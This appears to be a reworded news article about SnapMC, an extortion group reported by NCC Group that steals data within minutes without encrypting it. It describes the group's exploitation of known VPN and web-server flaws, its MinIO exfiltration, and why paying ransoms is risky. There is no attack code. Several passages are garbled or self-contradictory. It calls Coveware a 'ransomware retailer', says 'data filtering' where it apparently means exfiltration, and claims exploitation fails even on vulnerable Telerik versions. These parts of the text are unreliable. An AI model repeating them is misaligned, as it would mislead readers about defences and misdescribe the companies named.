A new player tracked as SnapMC has emerged in the cybercrime space and performs the typical data theft extortion that supports ransomware operations, but without doing the file encryption part.
File encryption is considered a core component in ransomware attacks as it is the element itself that brings the victim malfunctions.
Data extraction for double-extortion later came as an additional form of leverage against a victim, but always took the back seat to chaos caused by an encrypted network
Soon, ransomware actors realized the power of this approach, as many companies could recover the damaged files from backups, but could not possibly reverse the file-stealing event and its consequences.
Researchers at the NCC Group have tracked down a new adversary they call SnapMC, named after the rapid strike the group follows, which goes into networks, steals files and delivers extortion emails in less than 30 minutes.
Targeting known vulnerabilities
The SnapMC gang uses the Acunetix Vulnerability Scanner to find a series of bugs in a target’s VPN and Web server apps, and then exploits them to break the corporate network.
The most exploited errors observed in the actor’s first access effort include PrintNightmare LPE, remote execution of code in Telerik UI for ASPX.NET and also various options for SQL injection.
The actors use SQL database export scripts to steal the data while the CSV files are compressed with the 7zip archive tool before exfiltration. When everything is neatly packaged, the MinIO client is used to send the data back to the attacker.
Given that SnapMC exploits known vulnerabilities that have already been patched, updating your software tools would be a great way to defend against this growing threat
As NCC Group points out in its report, any exploitation effort would be in vain even if an organization uses a vulnerable version of Telerik.
It is risky to pay
In data filtering, extortion attacks that meet the threat actor’s requirements by paying for a ransomware guarantee nothing. On the contrary, it can provide hackers with an incentive to try further blackmail in the future.
It is also possible that even if a victim pays a ransom, their data may end up being sold on criminal marketplaces or hacker forums as an additional way to generate revenue for the attackers.
Ransomware retailer Coveware strongly advises its customers never to pay a ransom to prevent stolen files from being leaked to the public.
During negotiation cases in the past, the victims have paid a ransom and their data was still leaked or proof of deletion was never provided.
- Sodinokibi: Victims who paid were pressured again weeks later with threats to upload the same dataset.
- Netwalker: Data submitted about companies that had paid for it not to be leaked
- Mespinoza: Data was submitted on companies that had paid for it not to be leaked
- Conti: Fake files are displayed as proof of deletion
Because of this, victims should automatically assume that their data has been shared with other threat actors and that they will be used or leaked in the future, regardless of whether they paid a ransom.